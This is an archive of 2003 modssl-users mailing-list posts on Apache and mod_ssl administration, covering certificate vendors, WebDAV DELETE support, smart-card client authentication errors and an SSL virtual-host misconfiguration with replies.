X-Sender: "Kevin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It has been a long time since I have last posted.  I am looking at renewing
some of my SSL certs (Currently with VeriSign).  Has anyone used or had
problems with XRampSSL (verisignssl.com).  They are selling a 128 bit cert
for 180 for 3 years!  Why wouldn't I want to go with them (I do not care
about name recognition for this part of my website)?  I realize that my
question has nothing to do with modssl directly, but I thought this would be
a good forum to ask.

Thanks!
Kevin Klawon
CTO - InterSightTechnologies

Tel.: (888) 843-6935 Ext. 483
Mobile: 203-675-5644
Office:  407-888-0739

kevin@intersighttechnologies.com



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 17:48:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EDA222AA033; Thu, 22 May 2003 17:48:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id B50CC2AA019
	for ; Thu, 22 May 2003 17:48:10 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA14535
	for ; Thu, 22 May 2003 11:46:22 -0400
Date: Thu, 22 May 2003 11:46:20 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: contrib:
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Folks,

Being involved in a project to migrate our iPlanet web hosting to an
apache environment, I have developed a set of scripts that can parse our
an iPlanet obj.conf file to scarf out the software and hardware virtual
hosts for the iPlanet instances one might be running .  The scripts, a set of
three, call one another from the mainscript when fed the obj.conf file and
another paramater or two .  If others might find this tool useful, or
someone has a place to offer it to others from, let me know, it can
prevent one from recreating such a 'wheel'.

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 17:57:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 041842AA033; Thu, 22 May 2003 17:57:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 3B24B2AA019
	for ; Thu, 22 May 2003 17:57:19 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id F01C438241; Thu, 22 May 2003 09:13:14 -0700 (PDT)
Date: Thu, 22 May 2003 09:13:14 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL
Message-ID: <20030522161314.GA9782@rawbyte.com>
References: <9F1AE1497901D71185A20002A56B9B2601B0FC23@exchny43.ny.ssmb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC23@exchny43.ny.ssmb.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I dont know about iPlanet, but later versions of IIS support DAV.
Another option is to implement the functionality in a CGI script and hook up
the CGI to answer all requests for a particular method (DELETE in this case)
This can be done with Apache (checkout Script directive from mod_actions)
prob. with IIS and iPlaent as well (maybe some NSAPI and ISAPI programming
required) 
Like Ron mentions, it is probably necessary that you explain in more detail
what you want to accomplish. You may want to post the question in the apache
users list at http://httpd.apache.org/lists.html since it seems the question
is not mod_ssl specific 

Cheers

Daniel

> Thanks Daniel,
> 
> Is there any other way of deleting file through HTTP ?
> 
> Infact i have to implement this for multiple web servers like iPlanet, IIS
> etc. So i am trying to design some strategy, which can be worked out in all.
> 
> Regards
> Nauman
> 
> -----Original Message-----
> From: Daniel Lopez [mailto:daniel@rawbyte.com]
> Sent: Wednesday, May 21, 2003 2:09 PM
> To: modssl-users@modssl.org
> Subject: Re: ModSSL directives & Books about ModSSL
> 
> 
> 
> I guess by "delete option" you mean the delete WebDAV method that allows
> clients to remove files from the web server. I have another chapter online
> on it:
> 
> http://www.apacheworld.org/ty24/site.chapter13.html
> 
> It is for Apache 2, which already includes mod_dav. For Apache 1.3 it should
> work too, but you will need to download and install mod_dav separately,
> checkout htp://www.webdav.org
> 
> > Hi All,
> > 
> > I want to provide HTTP & HTTPS delete option on my webserver [general and
> > some specific folder]. 
> > 
> > apache [1.3.27] with mod-ssl
> > 
> > Do i need to make any configuration changes on server side to support it ?
> > Any config sample will be highly appreciated.
> > 
> > Regards
> > Nauman
> > 
> > 
> > -----Original Message-----
> > From: Daniel Lopez [mailto:daniel@rawbyte.com]
> > Sent: Friday, May 16, 2003 1:14 PM
> > To: modssl-users@modssl.org
> > Subject: Re: ModSSL directives & Books about ModSSL
> > 
> > 
> > 
> > > Are the apache directives/configuration for modssl handled only by the
> > > openssl package?  Or does modssl have it's own configuration settings?
> > > SSL well?  Such as something that covers setting up the apache
> httpd.conf
> > > file for secure site configuration (if the above applies), ssl apache
> > > directives, installing and maintaining CA certificates, keys, etc?  I
> > > checked amazon and there are only two books on ssl I could find, got a
> > great
> > > recommendation in the openssl forum for two good books on openssl.
> > 
> > I have the mod_ssl chapter of my book freely available online. I think
> > together with the mod_ssl reference documentation you should be fine, it
> > covers everything you mention. It is oriented towards Apache 2
> > 
> > http://www.apacheworld.org/ty24/site.chapter17.html
> > 
> > Best regards
> > 
> > Daniel
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 18:14:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59D592AA033; Thu, 22 May 2003 18:14:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 8C5852AA019
	for ; Thu, 22 May 2003 18:14:40 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA14690;
	Thu, 22 May 2003 12:12:48 -0400
Date: Thu, 22 May 2003 12:12:47 -0400 (EDT)
From: "R. DuFresne" 
To: Daniel Lopez 
Cc: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL
In-Reply-To: <20030522161314.GA9782@rawbyte.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 22 May 2003, Daniel Lopez wrote:

> 
> I dont know about iPlanet, but later versions of IIS support DAV.


which lead to many of thise IIS systems being sploited just recently,
AGAIN, since they tend to be poorly installed and even more poorly
maintained, even with the major headaches that ensue when one tries to do
so due to M$'s poor patch strutures and implimentations.  Anything less
the totally static pages in an IIS deployment needs to be CAREFULLY
considered, and even then, more carefully gone over prior to putting into
prodution by security staff.


so far dav support under other implimentations have not suffered in the
same area 

> Another option is to implement the functionality in a CGI script and hook up
> the CGI to answer all requests for a particular method (DELETE in this case)
> This can be done with Apache (checkout Script directive from mod_actions)
> prob. with IIS and iPlaent as well (maybe some NSAPI and ISAPI programming
> required) 

And, as always, be wary of how one impliments filters for what can be
input into and returned from the cgi.  one way validation is *not* the way
to do these things, of course everyone here knows this .

> Like Ron mentions, it is probably necessary that you explain in more detail
> what you want to accomplish. You may want to post the question in the apache
> users list at http://httpd.apache.org/lists.html since it seems the question
> is not mod_ssl specific 
> 


Thanks,

Ron DuFresne
	[SNIP  .sig cleanup]
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 25 15:32:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6A6942AA030; Sun, 25 May 2003 15:32:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.solcon.nl (mail.solcon.nl [212.45.33.11])
	by master.modssl.org (Postfix) with ESMTP id 4D1E72AA015
	for ; Sun, 25 May 2003 15:32:16 +0200 (CEST)
Received: from deze.atz.nl (dsl-213-134-248-042.solcon.nl [213.134.248.42])
	by mail.solcon.nl (8.12.9/SQL-8.12.9-10/8.12.5) with ESMTP id h4PDW7dH027010
	for ; Sun, 25 May 2003 15:32:08 +0200
Message-Id: <5.0.0.25.0.20030525135218.0420a040@pop.atz-hosting.nl>
X-Sender: atz@pop.atz-hosting.nl
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Sun, 25 May 2003 15:37:13 +0200
To: modssl-users@modssl.org
From: "A.T.Z." 
Subject: some ISP's allow to connect others don't
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-RAVMilter-Version: 8.4.1(snapshot 20020919) (mail.solcon.nl)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A.T.Z." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Quite a challenge..
Apache latest, mod_ssl latest, openssl latest, changes as per FAQ to 
httpd.conf are applied.

When connecting via ISP 1 SSL works fine, no matter which browser is used.
When connecting via ISP 2 SSL works fine, no matter which browser is used.
When connecting via ISP 3, 4 and 5 the fun really starts. As soon as the 
connections changes to https MSIE cannot show the page.. Mozilla complains 
that the document contains no data.. No matter whether logging is set to 
trace or debug, the ssl_engine_log does not show anything about that 
particular connection.

Same webserver, same client.. only another dailup/DSL ISP..

Latest DNS change was to remove a wildcard DNS entry. This has been more 
then one week ago and should have propagated to all ISP's even without the 
SSL worked fine for my own workstation.. But if I add the domain to the 
hosts file of the client I see no change in the behavior.

With other SSL aware websites (on other IP's) the client can connect 
without any problem, even with ISP 3, 4 and 5..

On the webserver there are no rules denying connections to port 80 or 443 
for these ISP's..

I'm really getting a bit confused here.. all tests seem to indicate there 
is a problem at the ISP's configuration..
Any thoughts on other causes are greatly appriciated..

TIA,


B.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 27 09:26:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C69EB2AA030; Tue, 27 May 2003 09:26:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from figaro.cs.interbusiness.it (relay-3.cs.interbusiness.it [151.99.250.107])
	by master.modssl.org (Postfix) with ESMTP id B797A2AA015
	for ; Tue, 27 May 2003 09:26:36 +0200 (CEST)
Received: from GiovanniXP.dianoema.it (host106-110.pool80105.interbusiness.it [80.105.110.106])
	by figaro.cs.interbusiness.it (8.12.6/8.12.6) with ESMTP id h4RAQg5g020025
	for ; Tue, 27 May 2003 09:26:43 -0100 (GMT)
Message-Id: <5.0.2.1.0.20030527090949.01831bb8@mail.linkupnet.com>
X-Sender: gcuccu@dianoema.it@mail.linkupnet.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 27 May 2003 09:25:15 +0200
To: modssl-users@modssl.org
From: Giovanni Cuccu 
Subject: Problems with Client authentication with smart card
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Giovanni Cuccu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,
	I'm trying to develop a client authentication web site with smart cards, 
but I have some problems.
in order to understand client auth I created my own CA with server and 
client certs. All works well, the site is visible only to clients with my 
certs installed. When I use smart cards things are not the same.
I got an error regarding certificate B.
Here is my apache log (with no bio dump).
[Mon May 26 12:35:14 2003] [debug] ssl_engine_kernel.c(1757): OpenSSL: 
Handshake: start
[Mon May 26 12:35:14 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: before/accept initialization
[Mon May 26 12:35:14 2003] [debug] ssl_engine_kernel.c(1794): OpenSSL: 
Exit: error in SSLv3 read client certificate A
[Mon May 26 12:35:14 2003] [debug] ssl_engine_kernel.c(1794): OpenSSL: 
Exit: error in SSLv3 read client certificate A
[Mon May 26 12:35:14 2003] [info] (70014)End of file found: SSL handshake 
interrupted by system [Hint: Stop button pressed in browser?!]
[Mon May 26 12:35:14 2003] [info] Connection to child 3 closed with 
abortive shutdown(server gio:443, client 127.0.0.1)

[Mon May 26 12:35:16 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 read client hello A
[Mon May 26 12:35:16 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 write server hello A
[Mon May 26 12:35:16 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 write certificate A
[Mon May 26 12:35:16 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 write certificate request A
[Mon May 26 12:35:16 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 flush data
[Mon May 26 12:35:17 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read 5/5 
bytes from BIO#5c27a8 [mem: 617568] (BIO dump follows)
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1198): Certificate 
Verification: depth: 1, subject: /C=IT/O=InfoCamere SCpA/OU=Ente 
Certificatore del Sistema Camerale/CN=InfoCamere Servizi di Certificazione, 
issuer: /C=IT/O=InfoCamere SCpA/OU=Ente Certificatore del Sistema 
Camerale/CN=InfoCamere Servizi di Certificazione
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1198): Certificate 
Verification: depth: 0, subject: /C=IT/O=Non Dichiarato/OU=RA=AZIENDA 
OSPEDALIERA DI 
PADOVA/CN=MASTROGIACOMO/STEFANO/2003149474A11/emailAddress=smastrogiacomo@dianoema.it/dnQualifier=2003149474A11/serialNumber=MSTSFN75C19A944V/SN=MASTROGIACOMO/GN=STEFANO, 
issuer: /C=IT/O=InfoCamere SCpA/OU=Ente Certificatore del Sistema 
Camerale/CN=InfoCamere Servizi di Certificazione
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 read client certificate A
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1765): OpenSSL: 
Loop: SSLv3 read client key exchange A
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1775): OpenSSL: 
Write: SSLv3 read certificate verify B
[Mon May 26 12:35:24 2003] [debug] ssl_engine_kernel.c(1789): OpenSSL: 
Exit: failed in SSLv3 read certificate verify B
[Mon May 26 12:35:24 2003] [info] SSL library error 1 in handshake (server 
gio:443, client 127.0.0.1)
[Mon May 26 12:35:24 2003] [info] SSL Library Error: 67567722 
error:0407006A:rsa routines:RSA_padding_check_PKCS1_type_1:block type is not 01
[Mon May 26 12:35:24 2003] [info] SSL Library Error: 67530866 
error:04067072:rsa routines:RSA_EAY_PUBLIC_DECRYPT:padding check failed
[Mon May 26 12:35:24 2003] [info] SSL Library Error: 336101498 
error:1408807A:SSL routines:SSL3_GET_CERT_VERIFY:bad rsa signature
[Mon May 26 12:35:24 2003] [info] Connection to child 2 closed with 
abortive shutdown(server gio:443, client 127.0.0.1)
I don't understand clearly the reason.
Certificate B is the CA one which must be sent from the browser?
If the above is correct is it possible that the browser tries to retrieve 
the ca cert from the samrt card and does not find it (I have the CA cert 
installed in the browser in the CA list)?
Can anyone help me or tell me where to find more documentation?
Thanks in advance,
	Giovanni


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 28 07:50:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A7058A895E; Wed, 28 May 2003 07:50:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-02.texas.rr.com (ms-smtp-02.texas.rr.com [24.93.36.230])
	by master.modssl.org (Postfix) with ESMTP id 04FD3A8933
	for ; Wed, 28 May 2003 07:50:30 +0200 (CEST)
Received: from tom (cs666817-180.austin.rr.com [66.68.17.180])
	by ms-smtp-02.texas.rr.com (8.12.5/8.12.2) with SMTP id h4S5oRfB020961
	for ; Wed, 28 May 2003 00:50:27 -0500 (CDT)
Message-ID: <012001c324dd$12baa4e0$6501a8c0@austin.rr.com>
From: "Tom Bartling" 
To: 
Subject: unknown protocol
Date: Wed, 28 May 2003 00:50:41 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_011D_01C324B3.29BB6A00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tom Bartling" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_011D_01C324B3.29BB6A00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

I am new to the list and relatively new to administering SSL, so please =
forgive me if this is not the right place to ask this question.

I am having trouble getting SSL to work. I'm on FreeBSD 4.5 Stable with =
apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.

Everything seems to have installed okay and I can run apachectl startssl =
without any problems, but I can't get SSL to actually work. When I try =
to go the url via https, it immediately displays the dreaded "this page =
cannot be displayed" message. When I run apachectl configtest, it spits =
out the following:

apachectl configtest
[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so =
uses plain Apache 1.3 API, this module might crash under EAPI! (please =
recompile it with -DEAPI)
Syntax OK

PHP works without any problems, so I'm not concerned about that at the =
moment. The manual says to try:

openssl s_client -connect localhost:443 -state -debug

As an alternative, it suggests:

curl https://localhost/

Both display an error message:

SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

So, I'm thinkin' that the problem is in the httpd.conf file. A few =
things that are in there of importance (excluding comments and all of =
the other stuff) include:

Port 80


Listen 80
Listen 443



#
#
#
#


DocumentRoot "/usr/local/www/data"
ServerName www.mintecommerce.com
ServerAdmin webmaster@mintecommerce.com
ErrorLog /var/log/httpd-error.log
TransferLog /var/log/httpd-access.log

SSLEngine on
SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
SSLCACertificatePath /usr/local/etc/apache/ssl.crt
SSLCARevocationPath /usr/local/etc/apache/ssl.crl
SSLVerifyClient require



You can see where I tried different versions of the VirtualHost tag (I =
did change the ServerName value for each variation). This is a server =
that hosts several sites, but they all use the same IP, so all of the =
VirtualHost tags are=20


...


This seems to get the job done for the few sites on this one computer, =
but now I need SSL. I'm at a loss and any help would be appreciated.

TIA,

Tom


------=_NextPart_000_011D_01C324B3.29BB6A00
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











Hi,


 


I am new to the list and relatively new =
to=20
administering SSL, so please forgive me if this is not the right place =
to ask=20
this question.


 


I am having trouble getting SSL to =
work. I'm on=20
FreeBSD 4.5 Stable with apache+mod_ssl-1.3.27+2.8.14 and=20
openssl-0.9.7a_2.


 


Everything seems to have installed okay =
and I can=20
run apachectl startssl without any problems, but I can't get SSL to =
actually=20
work. When I try to go the url via https, it immediately displays the =
dreaded=20
"this page cannot be displayed" message. When I run apachectl =
configtest, it=20
spits out the following:


 


apachectl configtest
[Tue May 27 =
23:20:56 2003]=20
[warn] Loaded DSO libexec/apache/libphp4.so uses plain Apache 1.3 API, =
this=20
module might crash under EAPI! (please recompile it with =
-DEAPI)
Syntax=20
OK


 


PHP works without any problems, so I'm =
not=20
concerned about that at the moment. The manual says to try:


 


openssl s_client -connect localhost:443 =
-state=20
-debug


 


As an alternative, it =
suggests:


 


curl https://localhost/


 


Both display an error =
message:


 


SSL: error:140770FC:SSL=20
routines:SSL23_GET_SERVER_HELLO:unknown protocol


 


So, I'm thinkin' that the problem is in =
the=20
httpd.conf file. A few things that are in there of importance (excluding =

comments and all of the other stuff) include:


 


Port 80


 


<IfDefine SSL>
Listen =
80
Listen=20
443
</IfDefine>


 


<IfDefine =
SSL>
#<VirtualHost www.mintecommerce.com:443&g=
t;
#<VirtualHost=20
secure.mintecommerce.com:443>
#<VirtualHost=20
mintecommerce.com:443>
#<VirtualHost =
*:443>
<VirtualHost=20
_default_:443>


 


DocumentRoot =
"/usr/local/www/data"
ServerName www.mintecommerce.com
Server=
Admin webmaster@mintecommerce.com
ErrorLog=20
/var/log/httpd-error.log
TransferLog =
/var/log/httpd-access.log


 


SSLEngine on
SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCe=
rtificateFile=20
/usr/local/etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile=20
/usr/local/etc/apache/ssl.key/server.key
SSLCACertificatePath=20
/usr/local/etc/apache/ssl.crt
SSLCARevocationPath=20
/usr/local/etc/apache/ssl.crl
SSLVerifyClient=20
require
</VirtualHost>
</IfDefine>


 


You can see where I tried different =
versions of the=20
VirtualHost tag (I did change the ServerName value for each variation). =
This is=20
a server that hosts several sites, but they all use the same IP, so all =
of the=20
VirtualHost tags are 


 


<VirtualHost=20
*>
...
</VirtualHost>


 


This seems to get the job done for the =
few sites on=20
this one computer, but now I need SSL. I'm at a loss and any help would =
be=20
appreciated.


 


TIA,


 


Tom


 


 


------=_NextPart_000_011D_01C324B3.29BB6A00--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 28 10:31:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 42959A8964; Wed, 28 May 2003 10:31:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id DFFBAA8962
	for ; Wed, 28 May 2003 10:31:34 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h4S8VXig001142
	for ; Wed, 28 May 2003 10:31:34 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.9/8.12.6) with ESMTP id h4S8VWie009281
	for ; Wed, 28 May 2003 10:31:33 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: unknown protocol
Date: Wed, 28 May 2003 10:31:32 +0200
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: unknown protocol
thread-index: AcMk3TaS48cdLR7KTGmFcfgWkQUVIAAFFSEQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Plain text please...

It looks like you are not succeeding in starting an SSL VH.

Looking at your config, there is no obvious error, although I don't know
why you put the "Listen 80" inside the IfDefine - this would mean that
even plain HTTP wouldn't work unless you started with SSL.=20

Just to be clear how it works, "apachectl startssl" causes the apache
control script to execute "httpd -DSSL". This starts apache with the
environment variable SSL defined. So when apache finds an 
container, it evaluates the condition as "true" and so reads the
directives inside. This is the canonical way of selecting SSL.=20

Of course, you don't need to bother with all of this. If you put the SSL
VH outside the  block (or just remove the 
tags) then the SSL VH and its directives will fire up in a normal
"apachectl start".

You might try this - just make sure you have a single VH on port 443 and
a Listen 443 and it should startup. Be careful you don't have a plain
HTTP VH on port 443 - it could supersede the SSL VH. To test, what
happens if you make a plain HTTP request to port 443 (it shouldn't
work!)

About the PHP warning - when you recompiled apache to include mod_ssl,
it patched the apache API to extend it to allow hooks into the OpenSSL
library (EAPI =3D Extended API). Since the PHP module was compiled =
before
this, it is expecting the standard API. Probably it will continue to
work since the EAPI is a superset of the API but you never know if there
will be a conflict in some call somewhere (you'll get a seg fault if
there is). The safest thing to do is to recompile mod_php against the
new API.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20



-----Original Message-----
From: Tom Bartling [mailto:tom@tombartling.com]
Sent: Mittwoch, 28. Mai 2003 07:51
To: modssl-users@modssl.org
Subject: unknown protocol


Hi,

I am new to the list and relatively new to administering SSL, so please
forgive me if this is not the right place to ask this question.

I am having trouble getting SSL to work. I'm on FreeBSD 4.5 Stable with
apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.

Everything seems to have installed okay and I can run apachectl startssl
without any problems, but I can't get SSL to actually work. When I try
to go the url via https, it immediately displays the dreaded "this page
cannot be displayed" message. When I run apachectl configtest, it spits
out the following:

apachectl configtest
[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so
uses plain Apache 1.3 API, this module might crash under EAPI! (please
recompile it with -DEAPI)
Syntax OK

PHP works without any problems, so I'm not concerned about that at the
moment. The manual says to try:

openssl s_client -connect localhost:443 -state -debug

As an alternative, it suggests:

curl https://localhost/

Both display an error message:

SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

So, I'm thinkin' that the problem is in the httpd.conf file. A few
things that are in there of importance (excluding comments and all of
the other stuff) include:

Port 80


Listen 80
Listen 443



#
#
#
#


DocumentRoot "/usr/local/www/data"
ServerName www.mintecommerce.com
ServerAdmin webmaster@mintecommerce.com
ErrorLog /var/log/httpd-error.log
TransferLog /var/log/httpd-access.log

SSLEngine on
SSLCipherSuite
